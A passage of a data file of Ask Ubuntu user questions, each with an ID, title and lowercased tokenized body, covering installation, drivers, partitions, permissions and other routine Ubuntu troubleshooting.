ubuntu , also i know the motherboard is geared towards windows ) unhide boot menu ( 10 seconds ) repair file systems boot from sda2 ( ubuntu ) by default separate /boot/efi partition : sda1 secure boot create a bootinfo summary check internet connection and installed pastebinit packages bootinfo url : http : //paste.ubuntu.com/6939618/ results were the grub menu starts up by default ( thats nice ) i did the recovery mode , an option menu appears , i tried the repair packages menu , it attempted and failed to connect to us.archive.ubuntu.com . all ~252 packages it wanted to upgrade further : from liveusb , pings to us.archive.ubuntu.com succeeded .
420200	no icons or menubars visible in ubuntu 13.10	i 'm unable to see any icons or menubars on my desktop . however , i am able to open up the file/folder explorer by inserting a usb , which opens up the explorer and let 's me open applications and files however , some applications are visible without the menubar on top , i.e . i ca n't close them . additionally , i can not search for terminal- no results show up . i found terminal in my usr/share/app-install/desktop directory , but am unable to open it i also ca n't open it using ctrl+alt+t . so far , i 've been able to work and open some files , folders , and applications , but the lack of icons is problematic . any ideas as to what the problem is ? this is ubuntu 13.10 -thanks for reading
420203	creating a core image	if i create an image ( ie. , install and do what i need to do for the image ) , is there a process or an application i can use to create a `` spin '' to roll out to a couple of computers , and is there a central management option for doing this ?
420210	amd64 or i386 for acer aspire 5530g	i have laptop acer aspire 5530g : amd turion x2 ultra dual-core mobile zm-80 2.1 with 2gb ram . so , what is ubuntu better : amd64 or i386 ? if cpu amd , but ram is 2 gb .
420213	installing windows network printer on ubuntu using samba	i need help in installation of canon lbp 2900 network printer on windows via samba on ubuntu 13.04 i am totally blank.. plz help.. thanks in advance ...
420214	booting from usb unsuccessful	i currently have ubuntu 12.04 32 bit installed , and would like to install ubuntu 13.10 64 bit . i downloaded the ubuntu 13.10 64 bit iso file . then i used startup disk creator to make my new 16 gb sandisk flash drive bootable with the iso file . that appeared to be successful . i then restarted my computer , and entered the bios settings so i could make the usb drive the first boot . i saved and exited setup , however my computer gets to the black screen with the white text and stays there not doing anything . i believe it says `` verifying dmi pool data ... '' at the bottom . i think that making the flash drive bootable was unsuccessful .
420223	weird behavior on second monitor	this problem just started happening the other day . i have a standard two-monitor display where the desktop is extended onto both . windows on monitor 2 do n't update anymore . if something changes in the window , it wo n't update until i click on another window on the first monitor . same with dragging windows across monitors . if i go from monitor 1 to monitor 2 , the window will disappear until i click on another window from monitor 1 . i believe it 's a software problem since i do n't experience this on my microsoft windows installation . i ca n't think of anything that i downloaded recently that could have caused the problem . is there a way to check the recent programs i downloaded to be sure ? any ideas on the issue ? could n't even think of what to google for such a problem . it 's also worth mentioning that i use gnome 3.4.1
420225	ca n't read and write from hard drive	i have a 1tb hard drive that i recently got , but the problem is that even when formatted i am unable to read and write from the hard drive . any suggestions ? i 've tried reformatting it , but the results were the same . the only thing i can think of is that the drive is only accessible by the root user , which is not very convenient .
420232	installing ubuntu on lenovo thinkpad t440s	i just received my lenovo thinkpad t440s . i would like to install ubuntu on it . i would like to keep the option of using windows through a vm on my system . here are my questions a ) lenovo did not ship me the os discs . is it possible for me to create a windows installation media from the recovery partition ? b ) what are all the partitions that i can get rid off once i have a recovery media created . would the installation media created from the recovery partition help me get rid off all the bloatware installed along ? a ) i do n't see any license key for windows unlike my dell laptops , will i be able to install the windows in a vm using the installation media created from the recovery partition ? b ) if i can not install this version of windows in a vm what would be the best way to dual boot the system using grub ( i think t440s uses uefi ) ? c ) are there any instructions available for one to install ubuntu or is it equally trivial like just booting of the usb drive and installing it like any normal system ?
420236	google earth has 2 version	i want to install google earth to my ubuntu . so i searched its download path from google . it is http : //dl.google.com/dl/earth/client/current/google-earth-stable_current_amd64.deb i find this path from http : //earth.google.com/ but a lot of ubuntu page ( in web ) recommends to download from http : //dl.google.com/earth/client/current/googleearthlinux.bin and i found this two file 's google earth version is not same . googleearthlinux.bin : version 6 google-earth-stable_current_amd64.deb : version 7 why a lot of page recommends to install old version ?
420237	how to proporly configure wine	i have a program i need to use and currently do not have enough disk space for dual booting or a vm , so i was wondering if someone could port this program to linux or help me configure wine to do so . this is the download link : www.srsroot.com i am running linux ubuntu 12.04 lts
420238	launcher does not appear on my desktop and applications frequently freeze	i am getting generally unacceptable performance from my computer . i have two types of problems : sometimes the launcher does not appear on my desktop . the web browser and other applications frequently freeze , and i am unable to even exit from them . what should i do ?
420246	graphics driver installation on dell inspiron 5110	i am using dell inspiron n5110 laptop that has an nvidia geforce gt 540m gpu . i am not getting the proper instructions for installing the graphics driver for my laptop . the current status for graphics is unknown . this is causing a problem of low graphics in ubuntu .
420250	problem with flash debugger	flash debugger is n't working on ubuntu 13.10 64-bit , but it 's working on ubuntu 12.04 32-bit . i need to install flash debugger on ubuntu 13.10 64-bit . look at : https : //gist.github.com/laszlomiklosik/2857310 . and check the indicator of debugger here : http : //flashplayerversion.com . maybe the problem in old version of nspluginwrapper . its site : nspluginwrapper.org
420251	gnome devhelp for microsoft window	can anyone please tell if devhelp application is available for microsoft window or not ? i have installed libgtk-3-doc on ubuntu . where the doc files are saved on the machine , so that i can use it to convert in chm or some other format , in order to use it on windows .
420252	resolve network connection problem at startup	i encounter problems during starting up ubuntu 12.04 laptop . there is no internet connection ( wired network connection is established though ) and there is no error message from network manager or other system part . in the very beginning , email is working but after 2-3 min it is not working anymore . other pcs are working ( email & internet ) without problem . router shows that internet connection is alive . after resetting router ( and network connection as well ) , problem disappears till next boot . which error or log file should i look in to try resolving the problem ?
420253	how do i force kubuntu 12.10 to boot in 32-bit mode ( linux 3.2.0-34-generic-pae ) ?	just upgraded from 12.04 to 12.10 , on my ancient 32-bit dell latitude c-400 laptop . after the install , i restarted my machine as directed by the os and got a blank screen . the computer appeared to be running fine , just no display . booting in grub gave me the option of two versions ( as well as recovery modes for both ) : linux 3.5.0-45-generic linux 3.2.0-34-generic-pae apparently 3.5 is the 64-bit version , and 3.2 is the 32-bit version . when i choose 3.2.0 , the system completes the boot sequence as it should , complete with functioning video display . how do i force kubuntu to boot in linux 3.2.0 ? if it 's as simple as changing the order of the versions listed in grub , how do i do that ? thanks in advance .
420254	how to online resize the root partition ? ( ext4 )	i 've got a 1tb harddisk with 3 partitons : fat32 /boot/efi ext4 / linux-swap my ext4 partition has 700 gib free so i would like to use some of that space ( like 200 gib ) for a windows 8 partition . how can i free some space if the partition is in use ? thanks for all answers
420256	how to calibrate battery on ubuntu 13.10	there is no option to disable `` when power is critically low '' power off , and i heard it should be disabled to be able to consume all the battery power . has anyone solved this issue ?
420258	unity not searching my mounted volumes	i am searching files in another volume the ubuntu has been mounted . and after mounting the volume i am not able to search files and folders of volume . what could be the possible solution to this problem ?
420260	dell 1160w driver asks for root priviledge ?	i am new to ubuntu . i have a gateway 32-bit laptop with ubuntu 12.04 which has a dell 1160w printer connected . the printer is configured under the available default driver dell 1100 . i test printed it and it came out with this message internal error - please use the proper driver . from my research of the dell : http : //www.dell.com/support/drivers/us/en/19/driverdetails ? driverid=1m4pc i downloaded the a00 unified linux driver release for dell b1160/w model and it supported ubuntu 12.04 . i followed the instruction as they told but i am stuck on step 4 , i tried to run the install.sh ( i am running the computer as the administrator ) but it keeps giving me this error `` you are not authorized to install the driver package . only user with root privileges is allowed to do this . '' when i run it as terminal run , it gave me this same error with this detailed shell : libstdc++.so.5 ( gcc 3.0.x .. 3.3.x ) not found , install ... /sbin/ldconfig.real : ca n't create temporary cache file /etc/ld.so.cache~ : permission denied done libtiff.so.3 not found , install ... /sbin/ldconfig.real : ca n't create temporary cache file /etc/ld.so.cache~ : permission denied done ** it seems qt library is not installed , or x display is not accessible . ** custom qt library will be configured for use with this package . my question is : how to i run this with root privileges ? install the linux driver and add network printer . 1 make sure that the machine is connected to your network and powered on . also , your machines ip address should have been set . 2 download the unified linux driver package from the dell website . 3 extract the unifiedlinuxdriver.tar.gz file and open the new directory . 4 double-click the linux folder > install.sh icon . 5 the dell installer window opens . click continue . 6 the add printer wizard window opens . click next . 7 select network printer and click search button . 8 the machines ip address and model name appears on list field . 9 select your machine and click next . 10 input the printer description and next . 11 after the machine is added , click finish . 12 when installation is done , click finish . 13 double-click the unified driver configurator . 14 click add printer . 15 the add printer wizard window opens . click next . 16 select network printer and click the search button . 17 the printers ip address and model name appears on list field . 18 select your machine and click next . 19 enter the printer description and click next . 20 after the machine is added , click finish . please help . thank you .
420264	dell xps13 bluetooth disabled in 12.04	i have updated the wifi firmware to 20.0.7.0 on my dell laptop and now the bluetooth seems disabled . it says that it is on , but when i enter in bluetooth settings it says that it is disabled . how can i enable it ? thank you .
420265	printer dissapearing on its own without user interaction	is it possible for a already installed network printer dissapearing on its own in ubuntu linux , forcing you to reinstall it ? this is the third time happening to me . the only other proper reason for this i can think off is if you deleted it . thank you
420267	vmware : check if 3d hardware is used for rendering or not	how do i check whether my vmware installation is using the gpu on the computer or using software rendering ? the output from glxinfo is opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on svga3d ; build : release ; opengl version string : 2.1 mesa 9.2.1
420269	how can i see an image ( .img ) in disk ?	i can see my .img image in terminal but i can not see that in explorer in ubuntu . % > ls -la .. -rw -- -- -- - 1 usr usr 500 ... image.img ..
420270	merge two partitions	i want to merge two partitions in my ubuntu machine . but i do n't want the files to be deleted in this process . i have a 50gb , formatted in ext 4 which i had installed my operating system and another one is 440 gb formatted in ext4 .
420271	cloning a hard disk or creating a backup	i am changing my hard disk because in ubuntu it shows `` disk failure is imminent '' . which option is better : should i clone my hard disk with new one or should i create a backup using ubuntu backup and then restore it to new hard disk ? how much time each will take for 500 gb hard disk ?
420272	remove windows 8 and install ubuntu	i am using a hp probook 450 laptop and currently running windows 8 on it . i want to completely delete windows 8 and all the data related with it . then i wish to install ubuntu , and want it to be the only os on my computer . i also need some guidance with partitioning when installing ubuntu to make full use of my hard drive .
420277	how to mount an image ( .img ) and find out the filesystem type as a disk in ubuntu ?	i 've tried to do mount -o loop file.img /mnt/img but it asks me the mount : you must specify the filesystem type then i could edit and unmount normally umount /mnt/img/ how do i check the filesystem type ? it is a raid disk . i 've used df -t and the result is udev devtmpfs 1279476 4 1279472 1 % /dev is devtmpfs a filesystem type ?
420278	ubuntu 12.04 server - default directory permissions	i am new to linux and i installed linux for web server purpose with apache2 . i have created a new directory /var/www/mysite . my main problem is that each new file i create has read only permissions 644 permissions using root user . i would like each new file created to have 775 permission . i am using ftp to update my files and simply each time i upload or create a new file i need to login via ssh and update permissions . i read around that there is umask and some ways to change default permissions for groups/users but i am not quite sure what would be the best solution . thanks in advance for any help ...
420279	installing oracle jdk without remove openjdk	i would install oracle jdk without remove openjdk , could that bring any problem to my ubuntu 12.04 configuration ? thanks
420280	steam not starting in ubuntu 12.04 lts 64bit	i tried almost everything i could find online but steam still does n't start . i installed steam on mint 16 and it worked perfectly . but i like ubuntu better so i hope there is a way to fix that . note : i would like a solution without having to reinstall another distro and i would like to keep using ubuntu 12.04lts . until the next lts comes out . when i run steam from the terminal i got message below : running steam on ubuntu 12.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 0_client ) /home/shayne/.local/share/steam/steam.sh : line 755 : 3139 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' mv : can not stat `/home/shayne/.steam/registry.vdf ' : no such file or directory installing bootstrap /home/shayne/.local/share/steam/bootstrap.tar.xz reset complete ! restarting steam by request ... running steam on ubuntu 12.04 64-bit steam_runtime has been set by the user to : /home/shayne/.local/share/steam/ubuntu12_32/steam-runtime installing breakpad exception handler for appid ( steam ) /version ( 0_client ) /home/shayne/.local/share/steam/steam.sh : line 755 : 3251 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ ''
420281	how to update maven 3.0.4 - 3.1.1	first of all am new to ubuntu as well as maven . does anyone know how to update maven . my current version of maven is 3.0.4 . i would like to update it to 3.1.1 which is the latest version . i tried sudo apt-get update maven but this did n't help much . any suggestion . am using maven for first time . also how to install apache-maven-3.1.1-bin.tar.gz i know there is an command like sudo apt-get install maven but it will download maven and then install it.. since i may need to install maven on a few systems downloading it each time wo n't be a better option for us . so i am looking forward answer for two questions how to update installed maven how to install downloaded package of maven apache-maven-3.1.1-bin.tar.gz
420284	lubuntu task manager always shows cpu usage at 100 % even at idle	is there a way to find out what application is causing the high cpu ? top shows nothing eating up the cpu . even at idle my cpu is at 100 % . never changes . never goes down . always at 100 % no matter what . % cpu ( s ) : 35.2 us , 64.8 sy these two figures always add up to 100 % no matter what . if one goes down in value the other immediately goes up to equal 100 % . always . is this harmful to the cpu ? is there a fix ? lubuntu 13.10 768mb ram p4 dell
420285	how to give access permission to specific folder by specific user in ubuntu . [ terminal ]	i am having below directory structure . /dr/sub/x1/ ... /x2/ ... /x3/ ... ... ... . i want to give acces permissions to user but in below manner , when ever i create new directory like x1 , x2 , x3 suppose i create x4 i want to create new user for this new directory which will only and only access /dr/sub/x4/ ... directory ... ..i.e . new user for new directory how can i achieve this . thanks in advance..
420286	blender keyboard binding over written by unity key bindings	i am trying to use blender to do some 3d modelling . and there is blender shortcut ctr+alt+0 is supposed to move the camera to current view . but in unity this shortcut minimizes the current window . is there anyway to make blender over-write this behaviour somehow ?
420290	crontab error `` no crontab for root ''	when i write crontab -e command in terminal , i get this error message : no crontab for root - using an empty one 888 i do n't know what '888 ' is meaning ? config file of crontab /etc/crontab : # /etc/crontab : system-wide crontab # unlike any other crontab you do n't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d . these files also have username fields , # that none of the other crontabs do . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin # m h dom mon dow user command 58 * * * * root cd / & & run-parts -- report /etc/cron.hourly 52 0 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 46 0 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 9 5 28 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) # please help me . thanks .
420297	using kernel headers in my program	i have seen an answer about the usage of kernel headers in how to use kernel headers appropriately ? . i have a similar set of errors , and the solution of using a -i/path/to/kernel headers is not helping . can anyone please help me on it ? i am using a linux 2.6.32 .
420298	how to install python gtkhtml2	i 've try to install straw 0.27 ( using sudo python setup.py install ) , but got error : error : 'gtkhtml2 ' module in package 'python-gnome2-extras ' is required to install straw i 've installed gnome-python-extras-dev pages but i 've still have the error .
420302	drivers for e-studio 2540 cse	i 've been searching for the drivers of my printer toshiba e-studio 2540 cse for about an hour and i have n't found anything . but i think they do exist because right here https : //bugs.launchpad.net/ubuntu/+source/cups-filters/+bug/978120/comments/45 someone says they were able to print something with it . could you please help me find the drivers for my printer ? ps : i 'm running ubuntu 13.10 32bits .
420303	top bar app launcher - in gnome 3 , what customisations will allow me to do this	i 'm new to gnome 3 and i adore one-click access to my favourite apps . on gnome classic i can launch chrome with a single click from an icon in the top bar . then i can repeat this to launch extra chrome windows the same way . i 've found some extentions and plugins which get close but it 's still two clicks . two clicks is too much , so is pressing a key . if i have to compromise my workflow i 'll just learn to hate it . my way is better . is n't everyone 's ? ; ) unfortunately writing my own is not possible . i 've been searching for a way of getting gnome 3 to allow me an always visible , single click launch solution . surely this must exist and i just have n't found it .
420305	how to decrease the brightness in samsung rv509 ?	i 'm using a samsung rv509 laptop with ubuntu 12.04 lts . can anyone help me to decrease the brightness in my laptop ?
420307	internet issues with ubuntu in oracle virtual box	i have ubuntu 12.04 lts installed in as a vm in oracle virtual box . i am able to browse from firefox but trying to connect from command prompt to update is failing . i also tried to change software sources but even then it is erroring out . the error is `` please check your internet connection '' . ps : i am using nat for networking . what might be is issue and how to correct it ?
420315	thinkpad t440p annoying static noise when i plug the speakers realtek alc292 hda intel pch 13.10	some laptop thinkpad t440p , with windows 8 is fine no noise . with ubuntu 12.04 and 13.10 , if i plug the speakers without music but with the volume up ( even low ) there is annoying noise come out . to interrupt the noise i need to put in mute mode . aplay -l *** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 0 : mid [ hda intel mid ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc292 analog [ alc292 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 dpkg -l | grep alsa ii alsa-base 1.0.25+dfsg-0ubuntu4 all alsa driver configuration files ii alsa-utils 1.0.27.1-1ubuntu1 amd64 utilities for configuring and using alsa ii bluez-alsa : amd64 4.101-0ubuntu8b1 amd64 bluetooth alsa support ii gstreamer0.10-alsa : amd64 0.10.36-1.1ubuntu1 amd64 gstreamer plugin for alsa ii gstreamer1.0-alsa : amd64 1.2.0-1ubuntu1 amd64 gstreamer plugin for alsa dpkg -l | grep pulseaudio ii gstreamer0.10-pulseaudio : amd64 0.10.31-3+nmu1ubuntu3 amd64 gstreamer plugin for pulseaudio ii gstreamer1.0-pulseaudio : amd64 1.2.0-1ubuntu1 amd64 gstreamer plugin for pulseaudio ii pulseaudio 1:4.0-0ubuntu6 amd64 pulseaudio sound server ii pulseaudio-module-bluetooth 1:4.0-0ubuntu6 amd64 bluetooth module for pulseaudio sound server ii pulseaudio-module-x11 1:4.0-0ubuntu6 amd64 x11 module for pulseaudio sound server ii pulseaudio-utils 1:4.0-0ubuntu6 amd64 command line tools for the pulseaudio sound server uname -a 3.11.0-15-generic # 25-ubuntu smp thu jan 30 17:22:01 utc 2014 x86_64 x86_64 x86_64 gnu/linux alsamixer card : hda intel pch f1 : help â chip : realtek alc292
420320	what permissions would change if i change umask to 027 from 022 ?	i have just started using lynis ( lynis is a software , please do n't think i have misspelled linux ) .after running it , i was suggested to set umask in /etc/login.defs and /etc/init.d/rc to 027 than the default 022 . i want to know what changes that would make to file permissions.also why is the value stored in two files ? do they work differently ? for more info if necessary , i use ubuntu 12.10 and i am the only user of the system .
420321	/ect/hosts file error	i am having some issues while running apt-get from my command line . i looked into some answers in askubuntu and found that we have to edit /etc/hosts file . the only entries present in that were more /etc/hosts 127.0.0.1 localhost 127.0.1.1 @ @ @ @ @ @ -vb # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters then i added extras.ubunutu.com as below more /etc/hosts 127.0.0.1 localhost 127.0.1.1 @ @ @ @ @ @ -vb 91.189.88.33 extras.ubuntu.com # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters still the problem persists . i tried to ping extras.ubuntu.com but failed . ping extras.ubuntu.com ping extras.ubuntu.com ( 91.189.88.33 ) 56 ( 84 ) bytes of data . ^c -- - extras.ubuntu.com ping statistics -- - 6 packets transmitted , 0 received , 100 % packet loss , time 4999ms i have changed my username in the question . but that should not be a problem in the vm can you please guide me where the problem is and how to fix it . thanks and appreciated in advance .
420329	how to activate the sign @	i have just installed ubuntu on my laptop , but i can not type @ ! how do i activate the sign @ on my laptop ? best regards flemming juel
420333	cant start ubuntu 12.04 on my asus gaming laptop , black and white error report	i 'm new to linux . i downloaded ubuntu correctly , started the windows ubuntu installer ( not the dvd/flash drive installation method ) and in the end ubuntu asked me to reboot . fine so far . when my computer is booting up i get this black and white text only screen saying something is wrong with my os . it gives me an file name and some code ... ( example : 00ex0000000 something like this ) now it gives me two options : enter = os selection ( i then choose windows and continue normally or choose ubuntu and the same message appears in a couple of seconds ) . esc = some random stoneage `` bios '' screen ( nothing releveant ) i have tried redownloading ubuntu and reinstalling it but nothing changes . i use windows 8 and i have at least 50 gb of memory left in my /d drive ( which is where ubuntu is saved after extracting it with winrar ) i also tried updating all my important drivers and applications , and clearing up my /d hdd space . is there a simple solution for this ?
420340	how to redirect all manuals to files ?	just for fun , or say for sake of convenience , i decided to write out all man pages to files . now if i have to do it one by one , i would do man package-name > filename . but i want to do some smart work and write all mans at once , either by using single command or by a bash script.all that i have come up with till now is cd /usr/share # you may use any folder whereis -m * | grep '.gz ' |awk ' { print $ 1 } ' |sed s/ : //g this gives an output , naming all applications having man pages.some part of it is as below . speech-dispatcher stellarium synaptic syslinux system-config-printer tabset terminfo totem ufw unetbootin unity unity-greeter update-manager upstart usb_modeswitch vim virtualbox vlc xmms2 xpdf yelp zenity now , what i need to do is redirect this output to man so that i could redirect it to files.once i do this , then i may create a script to cd to every folder and check for mans . so my question is , how do i achieve this ? or , maybe an alternate way exists ? i 'm using ubuntu 12.10 . please migrate it to stackoverflow if it 's appropriate there.though i think it 's more appropriate here .
420341	netgear n900 wifi adapter wo n't work on ubuntu	i 'm pretty new to ubuntu and i ca n't seem to get my wireless adapter working . it 's a netgear n900 usb wireless adapter . ~please help me ! ! ! ~
420342	is it possible to show kde panels only for a multimonitor layout ?	i love the flexibility of the plasma desktop panels , and i have my laptop + 2 external displays , each with a panel configured differently . however , when i unplug my laptop , all panels are gathered on my laptop screen and upon re-plugging they remain there . is there a way to auto-add and remove panels when new monitors are attached/removed ? a scripting solution is fine .
420343	moving files to usb stick and virus scan	i have the task of moving a single file to 50+ usb sticks and then virus scan them with clam-av . i have a 6 way usb hub that i can use to speed things up . i am after running a script that prompts for a file location and then to go and move the file across to all the plugged in usb sticks and then virus scan afterwards .
420344	skype unmet dependencies , ca n't install	i looked around a bit for some solutions first , but they did n't seem to work due to another issue . first of all , i freshly installed ubuntu 13.10 yesterday , did my updates and upgrades etc . so this is a fairly new/fresh system . when i try to install skype i get this error : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . when i add the canonical partners using this line : apt-add-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' and update , i get this : w : failed to fetch gzip : /var/lib/apt/lists/partial/fr.archive.ubuntu.com_ubuntu_dists_saucy_main_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . apt-get -f install did n't do anything . how can i fix this ?
420348	can not install any distro ( i tried usb and dvd )	i 've tried installing ubuntu 12.04 from a usb live flash drive with no success . i got a message box with an error message similar to this : installation failed the installer encountered an error copying files to the hard disk : [ errno 5 ] input/output error this is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . i say similar because that image belongs to this post , which seems to have the same problem : ubuntu based distros wont install when installing using a dvd ( in this case i chose kubuntu 12.04 ) the process completes successfully , but can not boot . i get to the screen where kubuntu shows four dots , and never loads . the dvd is not scratched , and the iso from the usb was checked with md5 sum . i wanted to try non-debian based distros , such as korora , openmandriva and rosa , but unetbootin now gets stuck in the process of copying , in an ubuntu live session . ( i had never had problems with unetbootin before ! ) when i try to access /home from the live session , i can see the lost+found folder and the one which belongs to the username i picked during installation . the problem is that it is completely empty , there are no subfolders such as videos , documents , pictures , etc . on the other hand , the / directory , located in another partition , seems to be properly installed . the partition where i have /home has root permissions , but my user directory ( the one with my username ) reads as follows : owner : 1000 - user # 1000 folder access : create and delete files group : 1000 , folder access : access files others : ( blank ) , folder access : access files is this ok ? i hope my hard disk is n't corrupted . btw , i checked the disk for errors with an option that is included in the live cd . no errors found . i did a memtest which is listed in the grub menu , and there was no problem with this either . i can not boot in recovery mode . do you have any suggestions other than buying a new hard drive ? ( just in case , i am going to ! )
420353	number of columns in a vim file	is there an equivalent for wc -l to have the number of columns of a vim file ? ( i have a file with several rows and columns separated by spaces )
420360	old pc linux & flash	ive got a few old towers lying around with integrated graphics & the following cpus sempron 2600+ sempron 2800+ sempron 3400+ athlon le1620 i have installed ubuntu 12.04 and tried to watch a flash video on filmon.com and on youtube and it instantly maxes the cpu out and it jutters along . would a different linux make a difference ? if so what do you recommend or do i need a graphics card to help the cpu along ? or is flash just doomed to not work on any of these cpus ? thanks
420362	where is the default location of ssl certs ?	i have a quick question maybe someone could help me with . i downloaded a few apps and iso 's from source forge today and they seemed to have disappeared . they were n't in the default down load folder or in the firefox download cache . so anyway , i started clicking around in my files trying to locate them and i came across a file string that i had n't seen before . /var/spool/postfix/etc/ssl/certs . and in it , i found all these ssl ca and root ca certificates ( maybe 200 to 300 of them ) . i can open them and see pub . key . algorithm , signature ( huge table of numbers ) and a bunch of other info that seems sensitive . i know very little about encryption and secure sockets , so i was wondering if this is a normal place to find such items . by the way i donât use local mail service on the machine . so i do n't know why anything would be in there . thank you . b
420363	how do i check virtualbox version from cli	i am writing a bash script to store the version number of virtualbox , but can not succeed . my script is : # ! /bin/bash installed_virtualbox= $ ( virtualbox -- version ) # -- version this is what i want to change i tried virtualbox -- version virtualbox -v virtualbox -v virtualbox -- version all seems to open the virtualbox instead of output . virtualbox -- help gives the version number , but the output is too long to store in variable and use later .
420364	how do i install and get started with vim/vi ?	i really hope someone on this subject can help me . i recently enrolled for a programming course and one subject requires me to program in c/c++ on linux os . i 've had previous c++ experience on the .net framework building console apps and winforms . the problem is this course wants us not to use any ide of any sort , the only thing we allowed to use is the terminal and something called 'vi commands ' . how can get started with ?
420371	vboxmanage -nologo list vms shows empty line	i have a vm `` base '' , which is created during creating partition . but vboxmanage -nologo list vms # shows empty line from user iftekhar ( ubuntu user ) my guest os is ubuntu and host os is windows 7 i found vm base in c : \users\ifte ( win user ) \virtualbox vms\base but i have not found any vm in home directory or root directory if i create any vm under user then vboxmanage -nologo list vms works now please tell me how create linked clone through command
420372	`` latest '' kernel version	later addition to the question : 1 ) this question ca n't be reduced to a single sentence , do n't ask me to do it . it might be rewritten in many different ways , but no one is easy . 2 ) you must have understood the question , not just have read it . ( see the difference ? ) otherwise you are guessing . therefore you ca n't just scan the text for question marks , such may be used in different ways . the extra information tells you what i already know , in that way we can avoid to give/get answers i already have . it saves time for both of us . 3 ) if the question is to long , to complicated , need a boring research or you do n't have clue about the answer . please leave it to someone else . the question itself - with some corrections well , i have been wondering about this for a while and a plain answer have been impossible to find . it is mainly about how the kernel is developed and maintained . i 'm using xubuntu 12.04 . ( kernel 3.2 ) and i 'm aware of later lts-kernel versions . the background to the question is that i have a fairly new motherboard . ( asus m5a99fx pro r2.0 . ) of course it was bundled with a set of windows drivers . but the solution for linux was far easier . it just said : use the latest kernel . the latest when i bought it was 3.8 , i think . ( do n't know for the release date . ) obviously easy to solve then , or not ! i could of course download and compile the vanilla kernel , or use the latest ubuntu-lts kernel . ( 3.11.x today . ) but is that necessary ? does n't the latest 3.2 kernel contain newer drivers as well as ordinary buggfixes ? ( noticeably , the xubuntu team released 12.04.4 with the old 3.2 kernel instead for the updated 3.11 . ) my uncertainty grew larger when i read about the linux-firmware package . maybe it is that instead of the kernel itself that is important ? i would be grateful if someone could explain this quite plain to me . if you know something about this , by now i think you also have understood what i need to know to get it right . best regards , kenneth
420374	can i change the gedit shell output colors ?	with the help of ( answers to ) questions like make gedit embedded terminal colours the same as the default terminal and how can i change the color of the text in a terminal embedded in gedit ? my gedit terminal now respects the theme colors ( actually : that is n't true . the terminal seems to use cobalt no matter what color scheme i set in the preferences , but at least i can read it . ) the `` shell output '' tab , however , is still all red letters on a white background and i do n't see where that is being set . how do i get gedit 's `` shell output '' tab to respect the theme colors ? using gedit - version 3.8.3
420375	how to add legal banner in /etc/issue and /etc/issue.net in ubuntu ?	while using lynis , i was suggested to add an legal banner.so what is a legal banner ? how do i add it to /etc/issue and /etc/issue.net ?
420376	how to automatically configure the keyboard , in order to get `` 多 ? '' by just pressing `` ? ''	in spanish there is no question mark ? alone , but it needs to be opened by 多 . is there a way to configure the keyboard , in order to automatically produce the pair 多 ? by just pressing one key ( say ? )
420380	ubuntu 12.10 crashing	i used wubi to install ubuntu . i did this after i did a factory restore on my windows 7 desktop , and cleaned out unnecessary junk , defragged , etc . i also did some hardware tests , and everything seems to work . this is my first experience with ubuntu or any linux system . it shows the grub screen where it 's asks if i want windows or ubuntu , and i select ubuntu . then ubuntu crashes at the login screen ( or just prior to it ) , makes repeated beeping noises ( in a loop ) , and has these strange diagonal lines through the screen . any suggestions on how to fix the problem ?
420381	really ? ! installing java in web browsers is a pain !	i have to install java in my browser ( which i never needed in the last two years , since i 'm running this installation of ubuntu ) . i 'm trying firefox and chromium ... anything that works will be ok . the ask ubuntu question java will not run in chromium , google chrome and firefox is not working for me . reading oracle 's documentation is another universe : manual installation and registration of java plugin for linux . the official ubuntu how-to that also makes no changes to my firefox installation , amd64/firefoxandplugins . in the terminal `` java -version '' returns : java version `` 1.7.0_51 ''
